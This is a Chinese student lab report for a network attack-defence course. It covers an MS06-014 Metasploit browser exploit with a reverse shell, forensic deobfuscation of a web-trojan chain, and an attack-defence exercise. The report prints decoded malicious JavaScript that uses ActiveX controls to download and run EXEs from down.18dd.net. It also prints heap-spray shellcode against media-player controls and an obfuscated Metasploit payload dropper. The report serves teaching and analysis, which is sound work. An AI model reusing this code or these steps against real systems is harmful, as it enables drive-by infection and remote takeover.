20232815 2023-2024-2 《网络攻防实践》实践十一报告

csdn推荐

2-2024-2 《网络攻防实践》实践十一报告 1.实践内容

网络渗透: 网络渗透是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络渗透也是安全工作者所研究的一个课题,在他们口中通常被称为”渗透测试(Penetration Test)”。

Web渗透攻击原理:

1.攻击者通过网络或者本地访问Web应用程序,找到Web应用程序的漏洞。

2.攻击者利用漏洞注入恶意代码、控制命令或者病毒等,从而获取或操作系统或者应用程序相关的敏感信息。

3.攻击者通过构造特定的URL,让Web应用程序误认用户输入的数据为安全数据,在处理过程中植入恶意代码或者请求后端的服务,从而获取敏感信息。

4.攻击者通过XSS(跨站脚本攻击〉,从而向用户传递植入恶意代码的链接或者脚本,从而实现攻击的目的。

2.实践过程 (1)web浏览器渗透攻击

任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。

实验步骤:

①选择使用Metasploit中的MS06-014渗透攻击模块

②选择PAYLOAD为任意远程Shell连接

③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本

④在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL

⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令

实验环境IP地址

Kali(攻击机)

192.168.43.4

Win2k(靶机)

192.168.43.66

输入命令msfconsole打开metasploit工具,使用search MS06-014查看漏洞信息,使用use exploit/windows/browser/ie_createobject选择漏洞。

使用命令show payloads可显示可用的载荷,这里将payload设置为generic/shell_reverse_tcp,使用命令set payload generic/shell_reverse_tcp。将lhost设置为攻击机的IP地址,将rhost设置为靶机的IP地址。输入命令exploit或run运行。

根据上步得到的Local IP,通过靶机的浏览器访问该地址,可以看到浏览器返回一串字符。

同时可以发现Kali中建立了一条会话,证明攻击成功。

在Kali中输入命令sessions -i 1启动会话,然后输入命令ipconfig,发现得到了靶机的信息,证明会话建立成功。

(2)取证分析实践—网页木马攻击场景分析

实践过程:

①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,

②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到

哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。

③如果解密出的地址给出的是网页或脚本文件,请继续解密。

④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。

⑤重复以上过程直到这些文件被全部分析完成。

将网页挂马分析实践文件下载到WinXP中并解压。

将start.html用记事本方式打开,查找new09.htm。

可以发现,start.html使用iframe框架引用new09.htm,使用记事本打开new09.htm。

将两个网址和进行MD5运算。散列值分别为:23180a42a2ff1192150231b44ffdf3d3和7f60672dcd6b5e90b6772545ee219bd3。

在hased文件夹中找到相对应的文件,将其以记事本方式打开。

1299644.js:

kl.htm:

发现kl.htm使用base64方式编码,使用了xxtea算法进行了加密,密钥为用十六进制表示的x73x63x72x69x70x74,经过解密,发现使用的密钥为script

使用xxtea工具对其进行解密。

解密后的结果为

<script>
eval("x66x75x6ex63x74x69x6fx6ex20x69x6ex69x74x28x29x7bx64x6fx63x75x6dx65x6ex74x2ex77x72x69x74x65x28x29x3bx7dx0dx0ax77x69x6ex64x6fx77x2ex6fx6ex6cx6fx61x64x20x3dx20x69x6ex69x74x3bx0dx0ax69x66x28x64x6fx63x75x6dx65x6ex74x2ex63x6fx6fx6bx69x65x2ex69x6ex64x65x78x4fx66x28x27x4fx4bx27x29x3dx3dx2dx31x29x7bx0dx0ax74x72x79x7bx76x61x72x20x65x3bx0dx0ax76x61x72x20x61x64x6fx3dx28x64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28x22x6fx62x6ax65x63x74x22x29x29x3bx0dx0ax61x64x6fx2ex73x65x74x41x74x74x72x69x62x75x74x65x28x22x63x6cx61x73x73x69x64x22x2cx22x63x6cx73x69x64x3ax42x44x39x36x43x35x35x36x2dx36x35x41x33x2dx31x31x44x30x2dx39x38x33x41x2dx30x30x43x30x34x46x43x32x39x45x33x36x22x29x3bx0dx0ax76x61x72x20x61x73x3dx61x64x6fx2ex63x72x65x61x74x65x6fx62x6ax65x63x74x28x22x41x64x6fx64x62x2ex53x74x72x65x61x6dx22x2cx22x22x29x7dx0dx0ax63x61x74x63x68x28x65x29x7bx7dx3bx0dx0ax66x69x6ex61x6cx6cx79x7bx0dx0ax76x61x72x20x65x78x70x69x72x65x73x3dx6ex65x77x20x44x61x74x65x28x29x3bx0dx0ax65x78x70x69x72x65x73x2ex73x65x74x54x69x6dx65x28x65x78x70x69x72x65x73x2ex67x65x74x54x69x6dx65x28x29x2bx32x34x2ax36x30x2ax36x30x2ax31x30x30x30x29x3bx0dx0ax64x6fx63x75x6dx65x6ex74x2ex63x6fx6fx6bx69x65x3dx27x63x65x3dx77x69x6ex64x6fx77x73x78x70x3bx70x61x74x68x3dx2fx3bx65x78x70x69x72x65x73x3dx27x2bx65x78x70x69x72x65x73x2ex74x6fx47x4dx54x53x74x72x69x6ex67x28x29x3bx0dx0ax69x66x28x65x21x3dx22x5bx6fx62x6ax65x63x74x20x45x72x72x6fx72x5dx22x29x7bx0dx0ax64x6fx63x75x6dx65x6ex74x2ex77x72x69x74x65x28x22x3cx73x63x72x69x70x74x20x73x72x63x3dx68x74x74x70x3ax5cx2fx5cx2fx61x61x2ex31x38x64x64x2ex6ex65x74x5cx2fx61x61x5cx2fx31x2ex6ax73x3ex3cx5cx2fx73x63x72x69x70x74x3ex22x29x7dx0dx0ax65x6cx73x65x7bx0dx0ax74x72x79x7bx76x61x72x20x66x3bx76x61x72x20x73x74x6fx72x6dx3dx6ex65x77x20x41x63x74x69x76x65x58x4fx62x6ax65x63x74x28x22x4dx50x53x2ex53x74x6fx72x6dx50x6cx61x79x65x72x22x29x3bx7dx0dx0ax63x61x74x63x68x28x66x29x7bx7dx3bx0dx0ax66x69x6ex61x6cx6cx79x7bx69x66x28x66x21x3dx22x5bx6fx62x6ax65x63x74x20x45x72x72x6fx72x5dx22x29x7bx0dx0ax64x6fx63x75x6dx65x6ex74x2ex77x72x69x74x65x28x22x3cx73x63x72x69x70x74x20x73x72x63x3dx68x74x74x70x3ax5cx2fx5cx2fx61x61x2ex31x38x64x64x2ex6ex65x74x5cx2fx61x61x5cx2fx62x2ex6ax73x3ex3cx5cx2fx73x63x72x69x70x74x3ex22x29x7dx7dx0dx0ax74x72x79x7bx76x61x72x20x67x3bx76x61x72x20x70x70x73x3dx6ex65x77x20x41x63x74x69x76x65x58x4fx62x6ax65x63x74x28x22x50x4fx57x45x52x50x4cx41x59x45x52x2ex50x6fx77x65x72x50x6cx61x79x65x72x43x74x72x6cx2ex31x22x29x3bx7dx0dx0ax63x61x74x63x68x28x67x29x7bx7dx3bx0dx0ax66x69x6ex61x6cx6cx79x7bx69x66x28x67x21x3dx22x5bx6fx62x6ax65x63x74x20x45x72x72x6fx72x5dx22x29x7bx0dx0ax64x6fx63x75x6dx65x6ex74x2ex77x72x69x74x65x28x22x3cx73x63x72x69x70x74x20x73x72x63x3dx68x74x74x70x3ax5cx2fx5cx2fx61x61x2ex31x38x64x64x2ex6ex65x74x5cx2fx61x61x5cx2fx70x70x73x2ex6ax73x3ex3cx5cx2fx73x63x72x69x70x74x3ex22x29x7dx7dx0dx0ax74x72x79x7bx76x61x72x20x68x3bx76x61x72x20x6fx62x6ax3dx6ex65x77x20x41x63x74x69x76x65x58x4fx62x6ax65x63x74x28x22x42x61x69x64x75x42x61x72x2ex54x6fx6fx6cx22x29x3bx7dx0dx0ax63x61x74x63x68x28x68x29x7bx7dx3bx0dx0ax66x69x6ex61x6cx6cx79x7bx69x66x28x68x21x3dx22x5bx6fx62x6ax65x63x74x20x45x72x72x6fx72x5dx22x29x7bx0dx0ax6fx62x6ax2ex44x6cx6fx61x64x44x53x28x22x68x74x74x70x3ax2fx2fx64x6fx77x6ex2ex31x38x64x64x2ex6ex65x74x2fx62x62x2fx62x64x2ex63x61x62x22x2cx20x22x62x64x2ex65x78x65x22x2cx20x30x29x7dx7dx0dx0ax7dx7dx7d")
</script>

将其转化为ASCII码:

function init() {
    document.write();
}
window.onload = init;
if (document.cookie.indexOf('OK') == -1) {
    try {
        var e;
        var ado = (document.createElement("object"));
        ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
        var as = ado.createobject("Adodb.Stream", "")
    } catch(e) {};
    finally {
        var expires = new Date();
        expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
        document.cookie = 'ce=windowsxp;path=/;expires=' + expires.toGMTString();
        if (e != "[object Error]") {
            document.write("")
        } else {
            try {
                var f;
                var storm = new ActiveXObject("MPS.StormPlayer");
            } catch(f) {};
            finally {
                if (f != "[object Error]") {
                    document.write("")
                }
            }
            try {
                var g;
                var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");
            } catch(g) {};
            finally {
                if (g != "[object Error]") {
                    document.write("")
                }
            }
            try {
                var h;
                var obj = new ActiveXObject("BaiduBar.Tool");
            } catch(h) {};
            finally {
                if (h != "[object Error]") {
                    obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)
                }
            }
        }
    }
}

对上述代码进行分析,发现涉及了4个网址,对应的哈希值如下:

网址哈希值

5d7e9058a857aa2abee820d5473c5fa4

3870c28cc279d457746b3796a262f166

5f0b8bf0385314dbe0e5ec95e6abedc2

1c1d7b3539a617517c49eee4120783b2

在hased文件夹中寻找文件:

将其转化为ASCII:

var url = "http://down.18dd.net/bb/014.exe";
try {
    var xml = ado.CreateObject("Microsoft.XMLHTTP", "");
    xml.Open
 
    ("GET", url, 0);
    xml.Send();
    as.type = 1;
    as.open();
    as.write(xml.responseBody);
    path = "..\ntuser.com";
    as.savetofile(path, 2);
    as.close
 
    ();
    var shell = ado.createobject("Shell.Application", "");
    shell.ShellExecute("cmd.exe", "/c " + path, "", "open", 0)
} catch(e) {}

通过对代码分析,发现此文件会下载一个名为的可执行文件。

使用unpacked工具对其进行转换:

var bigblock=unescape("%u9090%u9090");
var headersize=20;
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace=headersize+shellcode.length;
while(bigblock.length<slackspace)bigblock+=bigblock;
fillblock=bigblock.substring(0,slackspace);
block=bigblock.substring(0,bigblock.length-slackspace);
while(block.length+slackspace<0x40000)block=block+block+fillblock;
memory=new Array();
for(x=0;x<300;x++)
  memory[x]=block+shellcode;
var buffer='';
while(buffer.length<4068)buffer+="x0ax0ax0ax0a";
storm.rawParse(buffer)

提取其中的字符串,发现关键字shellcode,根据参考文件,shellcode是一个下载器,因此需要寻找其中的URL,最后找到的结果为得到一个可执行文件。

此文件使用了八进制的加密方法,将其转化为十六进制后再将其转化为ASCII文本:

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0;
 x<400;
 x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="x0ax0ax0ax0a";
pps.Logo = buffer

与上一个方法相同,得到一个可执行文件

得到一个可执行文件bd.exe。

URL哈希值

ca4e4a1730b0f69a9b94393d9443b979

268cbd59fbed235f6cf6b41b92b03f8e

ff59b3b8961f502289c1b4df8c37e2a4

对相应的文件计算md5的值,发现结果相同,推测4个文件相同。

使用IDA软件对其进行反汇编。

发现程序会下载20个木马程序对机器进行破坏。

(3)攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。

防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

实验环境IP地址

Kali(攻击机)

192.168.43.4

Win2k(靶机)

192.168.43.66

攻击:

打开metasploit进行攻击,具体攻击过程如下所示:

复制地址,将地址发送给防守方。

防守方访问链接后,攻击机可远程执行命令,证明攻击成功。

防守

靶机访问恶意网站,右键查看源代码:

发现语句间有很多空格,回车等,目的是为了隐藏自己,防止被杀毒软件发现。将代码进行格式化:

<html>
    
    <head>
        <title>
        </title>
        
            function aqVVjKGENoXCowkw( o ,n ) { var r = null; try { eval("r=o" + ".C"
            + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){} if (! r) { try { eval("r=o"
            + ".Cr" + "ea" + "teO"+ "bj"+ "ect(n,'')" ) }catch(e){} } if (! r) { try
            {eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
            } if (! r) { try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
            } if (! r){ try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
            } if (! r){ try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
            } return( r ); } function kGNrGbdSvfUenaxMxcMEVIkyhmQk( a ) { var s = aqVVjKGENoXCowkw(
            a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ); var o = aqVVjKGENoXCowkw(
            a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" ); var e = s.Environment( "P"
            + "ro" + "ce" + "ss" );var url = document.location + '/p' + 'ay'+ 'lo'
            + 'ad'; var xml = null; var bin = e.Item( "T" + "E" + "M" + "P" ) +"\iQbyCWUDtkCUZvcswaIyDKM"
            + ".e" + "xe"; vardat; try { xml=new XMLHttpRequest(); } catch(e) { try{
            xml = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
            } } if (! xml) { return(0); } xml.open("GET", url, false); xml.send(null);
            dat = xml.responseBody; o.Type = 1 ; o.Mode =3 ; o.Open ( ) ; o.Write (
            dat ) ; o.SaveToFile ( bin, 2) ; s.Run ( bin , 0 ); } function KssGjCOZrjj(
            ) { var i = 0; var t = new Array( '{' + 'B' + 'D' + '9' + '6' + 'C' + '5'
            + '5' + '6' + '-' + '6' + '5' + 'A' + '3' + '-' + '1' + '1' + 'D' + '0'
            + '-' + '9' + '8' + '3' + 'A' + '-' + '0' + '0' + 'C' + '0' + '4'+ 'F'
            + 'C' + '2'+ '9' + 'E' + '3'+ '6' + '}' , '{' + 'B' + 'D' + '9' + '6' +
            'C' + '5' +'5' + '6' + '-' + '6' + '5' +'A'+ '3' + '-' + '1' + '1'+ 'D'
            + '0' + '-' + '9' +'8' +'3' + 'A' + '-' + '0' + '0' + 'C' + '0' + '4' +
            'F' + 'C' + '2' + '9' + 'E' + '3' + '0' + '}' , '{' + '7' + 'F' + '5' +
            'B' + '7' + 'F' + '6' + '3' +'-' + 'F' + '0' + '6' + 'F' + '-' + '4' +
            '3' + '3' + '1' + '-' + '8' + 'A' + '2' +'6' + '-' + '3' + '3' + '9' +
            'E' + '0' + '3' + 'C' + '0' + 'A' + 'E' + '3' + 'D' + '}' , '{' + '6' +
            'e' + '3' + '2'+'0' + '7' + '0' + 'a' + '-' + '7' + '6' + '6' + 'd' + '-'
            + '4' + 'e' + 'e' + '6' + '-' + '8' + '7' + '9' + 'c' + '-' + 'd' + 'c'
            + '1' + 'f' + 'a' + '9' + '1' +'d' + '2' + 'f' + 'c' + '3' + '}' , '{'
            + '6' + '4' + '1' + '4' + '5' + '1' + '2' + 'B' + '-' + 'B' + '9' + '7'
            + '8' + '-' + '4' + '5' + '1' + 'D' + '-' + 'A' + '0' + 'D' + '8' + '-'
            + 'F' + 'C' + 'F' + 'D' + 'F' + '3' + '3' + 'E' + '8' + '3' + '3' + 'C'
            +'}' , '{' + '0' +'6' +'7' + '2' + '3' + 'E' + '0' + '9' + '-' + 'F' +
            '4' + 'C' + '2' + '-' + '4' + '3' + 'c' + '8' + '-' + '8' + '3' + '5' +
            '8' + '-' + '0' + '9' + 'F' + 'C' + 'D' + '1' + 'D' + 'B'+ '0' + '7' +
            '6' + '6' + '}' , '{' +'6' + '3' + '9' + 'F' + '7' + '2' + '5'+ 'F' + '-'
            + '1' + 'B' + '2' + 'D' + '-' + '4' + '8' + '3' + '1' + '-' + 'A' + '9'
            + 'F' + 'D' + '-' + '8' + '7' + '4' + '8' + '4' + '7' + '6' + '8' + '2'
            + '0' + '1' + '0' + '}' , '{' + 'B' +'A' + '0' + '1' + '8' +'5' + '9' +
            '9' + '-' + '1' + 'D' + 'B' + '3' + '-' + '4' + '4' + 'f' + '9' + '-' +
            '8' + '3' + 'B' + '4' + '-' + '4' + '6' + '1' + '4' + '5' + '4' + 'C' +
            '8' + '4' + 'B' + 'F' + '8' + '}' , '{' + 'D' + '0' + 'C' + '0' + '7' +'D'
            + '5' + '6'+ '-' + '7' + 'C' + '6' + '9' + '-'+ '4' + '3' + 'F' + '1' +
            '-' + 'B' + '4' + 'A' + '0' +'-' + '2' + '5' + 'F' + '5' +'A' + '1' +'1'
            + 'F' + 'A' + 'B' + '1' + '9' + '}', '{' + 'E' + '8' +'C' + 'C' + 'C' +
            'D' + 'D' + 'F' + '-' + 'C' + 'A' + '2' + '8' + '-' + '4' + '9' +'6' +
            'b' + '-' + 'B' + '0' + '5' + '0' + '-' + '6' + 'C' + '0' + '7' + 'C' +
            '9' + '6' + '2' + '4' + '7' + '6' + 'B' + '}' , '{' + 'A' + 'B' + '9' +
            'B' + 'C' + 'E' + 'D' + 'D' + '-' + 'E' + 'C' + '7' + 'E' + '-' + '4'+
            '7' + 'E' + '1' + '-' + '9' +'3' + '2' + '2' + '-' + 'D' + '4' + 'A' +
            '2' + '1' + '0' + '6' + '1' + '7' + '1' + '1' + '6' + '}' , '{'+ '0' +
            '0' + '0' + '6' + 'F' +'0' + '3' + '3' + '-' + '0' + '0' + '0' + '0' +
            '-' + '0' + '0' + '0' + '0' + '-' + 'C' + '0'+ '0' + '0'+ '-' + '0' + '0'
            + '0' + '0' + '0' + '0' + '0' + '0'+ '0' +'0' + '4' + '6' + '}' , '{' +
            '0' + '0' + '0' + '6' + 'F' +'0' + '3' + 'A' + '-' + '0' +'0' + '0' + '0'
            + '-' + '0' + '0' + '0' + '0' + '-' + 'C' + '0' + '0' + '0' + '-'+ '0'
            + '0' +'0' + '0' + '0' + '0' + '0' + '0' +'0' + '0' + '4' + '6' + '}' ,
            null ); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') {
            a = document.createElement("object"); a.setAttribute("cl" + "as" + "sid",
            "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ; } else
            { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var
            b= aqVVjKGENoXCowkw( a , "W" +"Sc" + "ri" + "pt" + ".S" + "he" + "ll")
            ; if (b) { kGNrGbdSvfUenaxMxcMEVIkyhmQk( a ) ; return(0) ;} } catch(e){
            } } i++; } }
            </script>
    </head>
    
    <body onload='KssGjCOZrjj()'>
        Cm
    </body>
</html>

发现其中包括着一个可执行文件的相关操作,证明有漏洞。

3.学习中遇到的问题及解决 4.实践总结

通过本次实验,我对Web渗透攻击,木马攻击等有了更进一步的理解,同时也意识到不能点击来历不明的链接防止上当受骗。

文章来源:https://blog.csdn.net/u014796654/article/details/139299151



微信扫描下方的二维码阅读本文

© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容